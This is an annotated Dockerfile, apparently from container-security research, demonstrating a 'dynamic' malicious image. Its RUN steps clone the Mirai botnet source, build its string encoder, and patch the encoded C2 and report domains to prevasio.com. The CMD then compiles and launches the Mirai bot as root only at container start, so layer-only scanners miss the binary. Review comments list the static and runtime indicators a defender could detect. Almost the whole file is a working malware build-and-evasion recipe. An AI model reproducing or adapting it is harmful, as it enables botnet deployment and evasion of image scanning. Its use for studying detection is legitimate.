Dockerfile

The following Dockerfile example demonstrates dynamic malicious container image creation.

The instructions in this file fetch the Mirai source from GitHub, replace the default C2 server name with 'prevasio.com', and then — at container start rather than at image build time — compile the Mirai bot as /mirai_bot.

# NOTE(review): this is a "dynamic" malicious image. Every RUN below executes at
# build time and leaves only the cloned source tree, a compiler, git and two
# helper scripts in the image layers; the bot binary /mirai_bot does not exist
# until the container starts and CMD runs /compile_and_run. A scanner that only
# inspects image layers for a known malicious binary would therefore not find
# it. The indicators that ARE present in the layers are the repository under
# /Mirai-Source-Code (with table.c already patched, see /patch below), the
# scripts /patch and /compile_and_run, and gcc/git in what is otherwise a
# runtime image. A compiler being launched from CMD at container start is
# itself a runtime detection signal. No USER is ever set, so the compile step
# and the bot run as root inside the container.
# the image is based on Ubuntu v14.04.5
FROM ubuntu:14.04.5

# updates the package lists (build time)
RUN apt update

# install GCC compiler — it stays in the final image because there is no
# separate build stage; the compiler is needed again at container start
RUN apt install -y gcc

# install Git
RUN apt install -y git

# fetch Mirai source code
# build-time clone: the complete source tree ends up in an image layer, which is
# the most reliable static indicator this image leaves behind
RUN git clone https://github.com/jgamblin/Mirai-Source-Code

# compile string encoder tool
# built here at image-build time; /patch below invokes it to produce the
# encoded strings that are searched for and substituted in table.c
RUN gcc /Mirai-Source-Code/mirai/tools/enc.c -o /Mirai-Source-Code/mirai/tools/enc.out

# drop a shell script into /patch
# the following echo lines write the body of /patch; nothing is evaluated yet
RUN echo "#!/bin/sh" > /patch

# mirai's source code contains encoded string 'cnc.changeme.com'
# here, we run string encoder tool to encode 'cnc.changeme.com', then escape the encoded string with sed command
# the encoded string is placed into old_cnc variable
# the "\$" escapes keep the $(...) substitution out of the build shell so it is
# evaluated when /patch itself runs (still at build time, see "RUN /patch"); the
# repeated backslashes are meant to survive the build shell, the script's shell
# and sed's replacement syntax — the exact counts are not verified here
RUN echo "old_cnc=\$(printf '%s' \"\$(/Mirai-Source-Code/mirai/tools/enc.out string cnc.changeme.com | tail -1)\" | sed -e 's/[]\/\$*.^|[]/\\\\\\\\&/g')" >> /patch

# do the same with the encoded string 'report.changeme.com'
RUN echo "old_report=\$(printf '%s' \"\$(/Mirai-Source-Code/mirai/tools/enc.out string report.changeme.com | tail -1)\" | sed -e 's/[]\/\$*.^|[]/\\\\\\\\&/g')" >> /patch

# now, encode 'prevasio.com' - our C2's new domain name
# for ethical and legal reasons, this is to make sure we don't touch someone else's domain name
RUN echo "new_domain=\$(printf '%s' \"\$(/Mirai-Source-Code/mirai/tools/enc.out string prevasio.com | tail -1)\" | sed -e 's/[]\/\$*.^|[]/\\\\\\\\&/g')" >> /patch

# next, we'll need to patch the source file table.c
# this is to replace encoded 'cnc.changeme.com' with encoded 'prevasio.com'
RUN echo "sed -i \"s/\$old_cnc/\$new_domain/g\" /Mirai-Source-Code/mirai/bot/table.c" >> /patch

# do the same to replace encoded 'report.changeme.com' with encoded 'prevasio.com'
RUN echo "sed -i \"s/\$old_report/\$new_domain/g\" /Mirai-Source-Code/mirai/bot/table.c" >> /patch

# make our script executable
RUN chmod +x /patch

# run it to make 2 patches to table.c source
# this runs at build time, so the table.c stored in the image layer already
# carries the encoded replacement domain rather than the upstream placeholder
RUN /patch

# drop a shell script to compile and run the bot into /compile_and_run
# unlike /patch, this script is only written here and is NOT executed during
# the build; it is the CMD of the image
RUN echo "#!/bin/bash" > /compile_and_run

# compile the bot from source with GCC
# static build with debug symbols, written to /mirai_bot at container start
RUN echo "gcc -std=c99 /Mirai-Source-Code/mirai/bot/*.c -DDEBUG -DMIRAI_TELNET -static -g -o /mirai_bot" >> /compile_and_run

# run the bot
# the script does not background this with '&'; whether /mirai_bot detaches on
# its own is not visible from this file
RUN echo "/mirai_bot" >> /compile_and_run

# make the script executable
RUN chmod +x /compile_and_run

# execute the script
# exec-form CMD: bash running /compile_and_run is PID 1; the compile (and the
# resulting write of a new executable to /) happens here, at container start
CMD ["/compile_and_run"]